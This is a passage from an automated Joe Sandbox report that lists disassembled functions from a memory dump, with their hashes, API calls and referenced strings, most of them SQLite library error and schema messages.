                                                            • String ID: Cannot add a column to a view$sqlite_altertab_%s$virtual tables may not be altered
                                                            • API String ID: 438689982-2063813899
                                                            • Opcode ID: 547cb7496cd76680ffb143b9acd7cbda9707e93bc72d9f8c59e08c6fdf96c3c9
                                                            • Instruction ID: 0e49969955423ece69d61705dea1a3af01afc1a81b39e2c11e17601809e397e5
                                                            • Opcode Fuzzy Hash: 547cb7496cd76680ffb143b9acd7cbda9707e93bc72d9f8c59e08c6fdf96c3c9
                                                            • Instruction Fuzzy Hash: EE91D1A2A0AB89C2DB52CF65D4946BD77A4FB48B80F459235DF8D077A6DF38E048C700
                                                            Function 00007FFBA45C7550 Relevance: 9.2, APIs: 3, Strings: 3, Instructions: 214COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 60379f6257e9eb3b8e9ab340d4ff75cb59f3ec471e2ee9b80591df60d0839046
                                                            • Instruction ID: de593d8da42d1b84f37a047cf972ff9c79ce502fec515398d711f540d254e986
                                                            • Opcode Fuzzy Hash: 60379f6257e9eb3b8e9ab340d4ff75cb59f3ec471e2ee9b80591df60d0839046
                                                            • Instruction Fuzzy Hash: 3191C0A3A09A86CAC721DB29E9806AB7BB0FB44B84F044132DF8947B65DF3CD155C740
                                                            Function 00007FFBA45DB0A2 Relevance: 8.0, APIs: 1, Strings: 4, Instructions: 485COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: 831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                            • API String ID: 3510742995-1759904473
                                                            • Opcode ID: defddaeb9fd67739c41f5e42114a3d13a060e9336ce3bb55b86e51b19b0f97b8
                                                            • Instruction ID: 184a5ebe6eae6fee01021bf24e94bff224f908cc57ace715d53c36f7a54683e2
                                                            • Opcode Fuzzy Hash: defddaeb9fd67739c41f5e42114a3d13a060e9336ce3bb55b86e51b19b0f97b8
                                                            • Instruction Fuzzy Hash: E9327BB2A0A642C6E751CF76D48426E77A2FF45B88F504136DE4D87BA9DF38E841CB40
                                                            Function 00007FFBA45C9CD0 Relevance: 7.9, APIs: 2, Strings: 3, Instructions: 385COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 96f507d9b9875c8520d21979787bbb00bf3c712726093243c0ed66bdc3c8419c
                                                            • Instruction ID: 74693ac03355196ed2f0a6696882d3af51933e58be9464bd71bb336823121f80
                                                            • Opcode Fuzzy Hash: 96f507d9b9875c8520d21979787bbb00bf3c712726093243c0ed66bdc3c8419c
                                                            • Instruction Fuzzy Hash: 0BF1A1A2E0A692C6EB66CB35D8807BE27A1FB04B98F144035DE4D577A5DF7CE881C340
                                                            Function 00007FFBA463ACC0 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 381COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: hidden$vtable constructor called recursively: %s$vtable constructor did not declare schema: %s$vtable constructor failed: %s
                                                            • API String ID: 3510742995-1299490920
                                                            • Opcode ID: 24d3f548164c3c727413c44823ce5731ff3500e30b8b2b32f783c6d282a2637e
                                                            • Instruction ID: e4e3f232217f49aaf619023056ad60a06f108498cf142f5f5539b2ea003de549
                                                            • Opcode Fuzzy Hash: 24d3f548164c3c727413c44823ce5731ff3500e30b8b2b32f783c6d282a2637e
                                                            • Instruction Fuzzy Hash: D8F1EEA2A0AB86C1EB52CB29E88437A77A0FB44F95F445276DE9D077A5DF3CE445C300
                                                            Function 00007FFBA45CA210 Relevance: 7.9, APIs: 2, Strings: 3, Instructions: 367COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 6317d1f0366df711ccbb85612adfa640f08fb7956397c07062b616eb10f3b511
                                                            • Instruction ID: 00c03ab83f4ea38b80ca76c0d8edf82ea882079aedbbe2a3bbeffa0d193cb76f
                                                            • Opcode Fuzzy Hash: 6317d1f0366df711ccbb85612adfa640f08fb7956397c07062b616eb10f3b511
                                                            • Instruction Fuzzy Hash: D3F19EB260AB81C6D791DB25E4847AE7BA1F784B84F148036EE8E43765DF79E885C700
                                                            Function 00007FFBA4626020 Relevance: 7.8, APIs: 2, Strings: 3, Instructions: 305COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA46268CC,?,?,00000000), ref: 00007FFBA46260A0
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00007FFBA46268CC,?,?,00000000), ref: 00007FFBA46261E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: %.*z:%u$column%d$rowid
                                                            • API String ID: 1297977491-2903559916
                                                            • Opcode ID: 56bdec2d0e16705477e103332ad0cfd1f19f9ad61f15f0a566ed91b37e11c37b
                                                            • Instruction ID: c726f9bc247077d0a532c4cb42d1f42a12ca1000e09ec3d22fbdcc5f36ad6931
                                                            • Opcode Fuzzy Hash: 56bdec2d0e16705477e103332ad0cfd1f19f9ad61f15f0a566ed91b37e11c37b
                                                            • Instruction Fuzzy Hash: 31C1F3A2E0B682D5EA568B29D9883BA67A0FF61B84F44A175DE4D077E5DF3CE401C300
                                                            Function 00007FFBA45C92B0 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 193COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: f95b54a4046d8bc0bd595eb3b13625d74fc78367791bef29465ec966645c1770
                                                            • Instruction ID: 993277d4edb75f1f8c469e1f480258a50eb9e98abede47da10698a34abf77805
                                                            • Opcode Fuzzy Hash: f95b54a4046d8bc0bd595eb3b13625d74fc78367791bef29465ec966645c1770
                                                            • Instruction Fuzzy Hash: D081EDB2A09A92D7E756CB29D4847AE7BA4FB48B84F008036EF4D477A1DF38E455C700
                                                            Function 00007FFBA4639610 Relevance: 7.7, APIs: 3, Strings: 2, Instructions: 158stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000001,?,00000000,00000000,00007FFBA46398A8,?,?,?,00007FFBA4639C38), ref: 00007FFBA4639767
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,00000001,?,00000000,00000000,00007FFBA46398A8,?,?,?,00007FFBA4639C38), ref: 00007FFBA4639781
                                                            • memcpy.VCRUNTIME140(?,?,?,?,00000001,?,00000000,00000000,00007FFBA46398A8,?,?,?,00007FFBA4639C38), ref: 00007FFBA4639818
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: strncmp$memcpy
                                                            • String ID: CRE$INS
                                                            • API String ID: 2549481713-4116259516
                                                            • Opcode ID: 9c94cafef7605850ca711360ee4e65a6f3a743faef5e2085b3389ab44af66a74
                                                            • Instruction ID: aeaf3114a3fe8fedfc21ef96e005c606cc68c1568e31d654952b9b5a8df485ae
                                                            • Opcode Fuzzy Hash: 9c94cafef7605850ca711360ee4e65a6f3a743faef5e2085b3389ab44af66a74
                                                            • Instruction Fuzzy Hash: 0C51A0A1B0B682C1FA569F3AD89427922A0BF81FD0F546575CE9D477E1DE3CE40ACB00
                                                            Function 00007FFBA45C6F10 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 153COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 3510742995-3764764234
                                                            • Opcode ID: 72ec62ebb50cb5be32859e59c3a317c5a0b90d92080e9b48b0985e2f720ee76c
                                                            • Instruction ID: 212f296628226a293bb0c06b70e6d9f571fc9940e3a5128163dc7cbf16107cb3
                                                            • Opcode Fuzzy Hash: 72ec62ebb50cb5be32859e59c3a317c5a0b90d92080e9b48b0985e2f720ee76c
                                                            • Instruction Fuzzy Hash: DD51E1B2609BC2C6CB11CB69E4849AE7BA1F744B84F144136EE8E43B65DB3CD095CB11
                                                            Function 00007FFBA45BDEF0 Relevance: 6.4, APIs: 1, Strings: 3, Instructions: 381COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcmp.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?), ref: 00007FFBA45BDF42
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcmp
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 1475443563-3764764234
                                                            • Opcode ID: a6624fa4cd18243959224f66b77d2d35bfc1efc769bcdb0de4b0009a4ea19b69
                                                            • Instruction ID: 448f1ca9b3fe9b20ae04720aa7e3be4d94fa27fcf3a95cf350e550d6bbca32c6
                                                            • Opcode Fuzzy Hash: a6624fa4cd18243959224f66b77d2d35bfc1efc769bcdb0de4b0009a4ea19b69
                                                            • Instruction Fuzzy Hash: 61F17FB2B05642DBE765CB7AC5806AD37A1FB44788B144035DF0D97BA4EF78E816C740
                                                            Function 00007FFBA4601040 Relevance: 6.3, APIs: 5, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy$memset
                                                            • String ID:
                                                            • API String ID: 438689982-0
                                                            • Opcode ID: 47bbe8ba92e191afe8651bc5c485290a6e5130f0fb9df520d9df69e16ec27a69
                                                            • Instruction ID: 8de575e89915d33910576dcc0d95b9e8f358312761ae1832d6d8082fa045196a
                                                            • Opcode Fuzzy Hash: 47bbe8ba92e191afe8651bc5c485290a6e5130f0fb9df520d9df69e16ec27a69
                                                            • Instruction Fuzzy Hash: EE2151A2A19751D3DA659B2AF9811FAA365FB447C0B046135DFCE47FA6DF2DE050C300
                                                            Function 00007FFBA46343C0 Relevance: 6.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FFBA4634892), ref: 00007FFBA463456B
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FFBA4634892), ref: 00007FFBA46345EE
                                                            • memcpy.VCRUNTIME140(?,?,?,?,?,?,00000080,?,00000000,00007FFBA4634892), ref: 00007FFBA46346DB
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: RETURNING may not use "TABLE.*" wildcards
                                                            • API String ID: 3510742995-2313493979
                                                            • Opcode ID: c9e3d9247948fcffe6fbe48892c6ebabfb1504096c290878a45634d262bc3d93
                                                            • Instruction ID: cc9ce4f7b9513a9ce18141ffeb8fe74ab89019c84868bd1ca5b8a64c59511840
                                                            • Opcode Fuzzy Hash: c9e3d9247948fcffe6fbe48892c6ebabfb1504096c290878a45634d262bc3d93
                                                            • Instruction Fuzzy Hash: 13B1B3A2A0ABC1C5E712CF29D9802A9B7A0FB45BA4F15A375DE6C077E5DF38E554C300
                                                            Function 00007FFBA45BFCC0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 2221118986-3764764234
                                                            • Opcode ID: 814c724986b2a18afb897755327e1bee89b76cd8a67e7e84cf0f567dd5f8b430
                                                            • Instruction ID: 1989c8b468ab7a54ee0245f9d151c1a3573fbe269afa977574576e69c9c676b6
                                                            • Opcode Fuzzy Hash: 814c724986b2a18afb897755327e1bee89b76cd8a67e7e84cf0f567dd5f8b430
                                                            • Instruction Fuzzy Hash: C98177A3A0A1D189E362CF39E4805F93A91E711791F45413AEFCAC7291EB7CD987D320
                                                            Function 00007FFBA463C2B0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 213COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.VCRUNTIME140 ref: 00007FFBA463C415
                                                              • Part of subcall function 00007FFBA45A86C0: memcpy.VCRUNTIME140(?,?,%s at line %d of [%.10s],00007FFBA45A80C1), ref: 00007FFBA45A86F1
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: AND $<expr>$rowid
                                                            • API String ID: 3510742995-4041574714
                                                            • Opcode ID: 16f16b447587eb6b20782a5644277ec7c6a4c2f7cff12a977d291bb4bdc062f3
                                                            • Instruction ID: fc266f19464e5564ec5aad8e2a00f6249d3fe9ae7ad82c99c05cea9f74765cca
                                                            • Opcode Fuzzy Hash: 16f16b447587eb6b20782a5644277ec7c6a4c2f7cff12a977d291bb4bdc062f3
                                                            • Instruction Fuzzy Hash: B6A1BDB2A09682C5EB1ACF39D8C05383761EB55B88F546075EE0E473A9DF3CE885D780
                                                            Function 00007FFBA4625CC0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 197COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s.%s$column%d$rowid
                                                            • API String ID: 0-1505470444
                                                            • Opcode ID: a81bc03f9b919587f08a4253e98ba2c81826b73d45dc8734a33354cdbc491ff4
                                                            • Instruction ID: 0f73ac5c271e247ab28645df56ca0d1dc6f2be9d41861619b0afbfd05fb55950
                                                            • Opcode Fuzzy Hash: a81bc03f9b919587f08a4253e98ba2c81826b73d45dc8734a33354cdbc491ff4
                                                            • Instruction Fuzzy Hash: D391ACB2A0AB81D1EA61CB29E8843A963A4FB45BB4F445376DEAC473E5DF38D445C700
                                                            Function 00007FFBA4600DB0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 183COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: $, $CREATE TABLE
                                                            • API String ID: 3510742995-3459038510
                                                            • Opcode ID: fa8cf838df302184ee073391465fd370c3f98bb1d4b5eae281e358e386354600
                                                            • Instruction ID: bd5bc21a67c732628376e43c54086d8b05d9a6299b65806e676cac4a9cdc14e8
                                                            • Opcode Fuzzy Hash: fa8cf838df302184ee073391465fd370c3f98bb1d4b5eae281e358e386354600
                                                            • Instruction Fuzzy Hash: 156119A2B0A581D5DB168F38E8802BAA792FB807A4F489775DE5E437E1DF3CD446C300
                                                            Function 00007FFBA45B90C0 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 176COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
                                                            • Associated: 00000004.00000002.2727449682.00007FFBA45A0000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727655241.00007FFBA46CE000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727728834.00007FFBA46FB000.00000004.00000001.01000000.00000023.sdmpDownload File
                                                            • Associated: 00000004.00000002.2727793919.00007FFBA4700000.00000002.00000001.01000000.00000023.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_7ffba45a0000_Mai.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                            • API String ID: 0-3764764234
                                                            • Opcode ID: 600486f4688d1bf41b391cf25a0a24c42c4f10a74e68b889563185592faff8e3
                                                            • Instruction ID: e8db0f8a42240ad68d8f1b3577cd99bb2610c72d3642c0b757347306a2d08e78
                                                            • Opcode Fuzzy Hash: 600486f4688d1bf41b391cf25a0a24c42c4f10a74e68b889563185592faff8e3
                                                            • Instruction Fuzzy Hash: 3D711FA1A0AA46C1EB669B25D4C437EB3A1FF84B84F145035CE4D477B5EF7CE8469340
                                                            Function 00007FFBA4606700 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2727513088.00007FFBA45A1000.00000020.00000001.01000000.00000023.sdmp, Offset: 00007FFBA45A0000, based on PE: true
